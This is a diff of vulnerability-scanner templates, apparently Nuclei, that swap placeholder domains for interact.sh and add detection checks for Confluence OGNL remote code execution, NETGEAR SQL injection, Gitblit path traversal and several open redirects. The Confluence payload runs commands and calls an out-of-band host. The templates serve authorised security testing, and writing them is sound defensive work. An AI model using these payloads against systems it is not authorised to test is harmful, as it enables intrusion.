- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -3,7 +3,7 @@ id: CVE-2021-20090
info: info:
name: Buffalo WSR-2533DHPL2 - Path Traversal name: Buffalo WSR-2533DHPL2 - Path Traversal
author: gy741 author: gy741
severity: high severity: critical
description: | description: |
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces. Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
reference: reference:
@ -11,8 +11,8 @@ info:
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - https://nvd.nist.gov/vuln/detail/CVE-2021-20090
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.6 cvss-score: 9.8
cve-id: CVE-2021-20090 cve-id: CVE-2021-20090
cwe-id: CWE-22 cwe-id: CWE-22
tags: cve,cve2021,lfi,buffalo,firmware,iot,cisa tags: cve,cve2021,lfi,buffalo,firmware,iot,cisa

View File

@ -21,7 +21,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/adminer?elastic=example.com&username=" - "{{BaseURL}}/adminer?elastic=interact.sh&username="
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -28,7 +28,7 @@ requests:
"user_login":"{{randstr}}", "user_login":"{{randstr}}",
"password":"{{randstr}}", "password":"{{randstr}}",
"user_name":"{{randstr}}", "user_name":"{{randstr}}",
"user_email":"{{randstr}}@example.com" "user_email":"{{randstr}}@interact.sh"
} }
matchers-condition: and matchers-condition: and

View File

@ -23,7 +23,7 @@ requests:
- | - |
GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1 GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Referer: http://evil.com/127.0.0.1.html Referer: http://interact.sh/127.0.0.1.html
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -31,4 +31,4 @@ requests:
- type: word - type: word
words: words:
- "<title>Example Domain</title>" - "<h1> Interactsh Server </h1>"

View File

@ -20,12 +20,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"
stop-at-first-match: true stop-at-first-match: true
redirects: true redirects: true
@ -37,5 +37,5 @@ requests:
- 200 - 200
- type: word - type: word
words: words:
- "<title>Example Domain</title>" - "<h1> Interactsh Server </h1>"
part: body part: body

View File

@ -22,10 +22,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com" - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header

View File

@ -18,10 +18,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym" - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header

View File

@ -23,7 +23,7 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
- | - |
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1 GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
redirects: true redirects: true
@ -31,7 +31,7 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
extractors: extractors:
- type: regex - type: regex

View File

@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/" - "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header
# Enhanced by mp on 2022/04/13 # Enhanced by mp on 2022/04/13

View File

@ -19,14 +19,14 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com" - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status - type: status
status: status:

View File

@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com" - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13 # Enhanced by mp on 2022/04/13

View File

@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com" - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13 # Enhanced by mp on 2022/04/13

View File

@ -18,12 +18,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com" - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/21 # Enhanced by mp on 2022/04/21

View File

@ -17,10 +17,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com" - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -19,7 +19,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -32,7 +32,7 @@ requests:
words: words:
- "Content-Disposition: attachment;filename=test.txt" - "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test" - "Set-Cookie:CRLFInjection=Test"
- "Location: example.com" - "Location: interact.sh"
- "X-XSS-Protection:0" - "X-XSS-Protection:0"
part: header part: header
condition: and condition: and

View File

@ -0,0 +1,33 @@
id: CVE-2021-27748
info:
name: IBM WebSphere Portal SSRF
author: pdteam
severity: high
description: |
A Server Side Request Forgery vulnerability affects HCL Digital Experience, on-premise deployments and containers.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
classification:
cve-id: CVE-2021-27748
tags: cve,cve2021,hcl,ibm,ssrf,websphere
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<h1> Interactsh Server </h1>"

View File

@ -27,7 +27,7 @@ requests:
Connection: close Connection: close
- | - |
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1 GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept-Language: en Accept-Language: en
Connection: close Connection: close

View File

@ -19,10 +19,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/new/newhttp://example.com" - "{{BaseURL}}/new/newhttp://interact.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header

View File

@ -6,7 +6,7 @@ info:
severity: medium severity: medium
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
will pass FS's relative URL check however many browsers will gladly convert this to http://example.com. will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
reference: reference:
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
- https://github.com/Flask-Middleware/flask-security/issues/486 - https://github.com/Flask-Middleware/flask-security/issues/486
@ -21,10 +21,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/login?next=\\\example.com' - '{{BaseURL}}/login?next=\\\interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -20,7 +20,7 @@ info:
requests: requests:
- raw: - raw:
- |+ - |+
GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Connection: close Connection: close
@ -34,6 +34,6 @@ requests:
- type: word - type: word
words: words:
- "com\"/onmouseover=\"alert(1)\">" - "sh\"/onmouseover=\"alert(1)\">"
# Enhanced by mp on 2022/04/21 # Enhanced by mp on 2022/04/21

View File

@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header

View File

@ -34,11 +34,11 @@ requests:
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_email" Content-Disposition: form-data; name="reg_email"
{{randstr}}@example.com {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password" Content-Disposition: form-data; name="reg_password"
{{randstr}}@example.com {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password_present" Content-Disposition: form-data; name="reg_password_present"
@ -46,11 +46,11 @@ requests:
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_first_name" Content-Disposition: form-data; name="reg_first_name"
{{randstr}}@example.com {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_last_name" Content-Disposition: form-data; name="reg_last_name"
{{randstr}}@example.com {{randstr}}@interact.sh
-----------------------------138742543134772812001999326589 -----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="_wp_http_referer" Content-Disposition: form-data; name="_wp_http_referer"
@ -89,7 +89,7 @@ requests:
Origin: {{BaseURL}} Origin: {{BaseURL}}
Referer: {{BaseURL}} Referer: {{BaseURL}}
log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In
- | - |
GET /wp-admin/ HTTP/1.1 GET /wp-admin/ HTTP/1.1

View File

@ -21,13 +21,13 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}//example.com/%2f..' - '{{BaseURL}}//interact.sh/%2f..'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header
- type: status - type: status

View File

@ -20,12 +20,12 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com' - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# Enhanced by mp on 2022/03/16 # Enhanced by mp on 2022/03/16

View File

@ -19,7 +19,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/auth/logout?continue=//example.com" - "{{BaseURL}}/auth/logout?continue=//interact.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -33,6 +33,6 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/27 # Enhanced by mp on 2022/02/27

View File

@ -21,14 +21,14 @@ requests:
- | - |
GET / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
X-Forwarded-Host: //example.com X-Forwarded-Host: //interact.sh
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
- type: status - type: status
status: status:

View File

@ -19,7 +19,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/lab.html?vpath=//example.com" - "{{BaseURL}}/lab.html?vpath=//interact.sh"
matchers: matchers:
- type: regex - type: regex

View File

@ -22,10 +22,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1' - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -17,10 +17,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com" - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

View File

@ -20,12 +20,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/index.php/example.com' - '{{BaseURL}}/index.php/interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/03/08 # Enhanced by mp on 2022/03/08

View File

@ -0,0 +1,44 @@
id: CVE-2022-26134
info:
name: Confluence - Remote Code Execution via OGNL template injection
author: pdteam,jbertman
severity: critical
description: |
Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center.
reference:
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- https://jira.atlassian.com/browse/CONFSERVER-79016
classification:
cve-id: CVE-2022-26134
metadata:
shodan-query: http.component:"Atlassian Confluence"
tags: cve,cve2022,confluence,rce,ognl,oast
requests:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
- "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"
stop-at-first-match: true
req-condition: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(to_lower(all_headers_1), "x-cmd-response:")'
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(to_lower(response_2), "confluence")'
condition: and
extractors:
- type: kval
part: header
kval:
- "x_cmd_response"

View File

@ -0,0 +1,44 @@
id: CVE-2022-29383
info:
name: NETGEAR ProSafe SSL VPN firmware - SQL Injection
author: elitebaz
severity: critical
description: |
NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
reference:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
- https://nvd.nist.gov/vuln/detail/CVE-2022-29383
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29383
metadata:
verified: "true"
tags: cve,cve2022,sqli,netgear,router
requests:
- raw:
- |
POST /scgi-bin/platform.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
- |
POST /scgi-bin/platform.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_1, "User authentication Failed")
- contains(body_2, "User Login Failed for SSLVPN User.")
condition: and

View File

@ -0,0 +1,46 @@
id: CVE-2022-31268
info:
name: Gitblit 1.9.3 - Path traversal
author: 0x_Akoko
severity: high
description: |
A Path Traversal vulnerability in Gitblit 1.9.3 can lead to reading website files via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
reference:
- https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md
- https://www.cvedetails.com/cve/CVE-2022-31268
- https://vuldb.com/?id.200500
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-31268
cwe-id: CWE-22
metadata:
shodan-query: http.html:"Gitblit"
verified: "true"
tags: cve,cve2022,lfi,gitblit
requests:
- method: GET
path:
- "{{BaseURL}}/resources//../WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</web-app>"
- "java.sun.com"
- "gitblit.properties"
condition: and
- type: word
part: header
words:
- "application/xml"
- type: status
status:
- 200

View File

@ -0,0 +1,34 @@
id: eventum-panel
info:
name: Eventum Panel Detect
author: princechaddha
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:305412257
tags: panel,eventum
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<title>Login - Eventum</title>'
- 'title="Eventum Issues search"'
condition: or
- type: word
part: body
words:
- 'Database Error:'
- 'There seems to be a problem connecting to the database server specified in your configuration file'
condition: and

View File

@ -2,23 +2,38 @@ id: zte-panel
info: info:
name: ZTE Panel name: ZTE Panel
author: github.com/its0x08 author: its0x08,idealphase
severity: info severity: info
description: |
ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.
reference:
- https://www.zte.com.cn/global/
metadata:
verified: true
shodan-query: http.html:"ZTE Corporation"
tags: panel,zte tags: panel,zte
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "ZTE Corporation. All rights reserved. </div>" - "ZTE Corporation. All rights reserved. </div>"
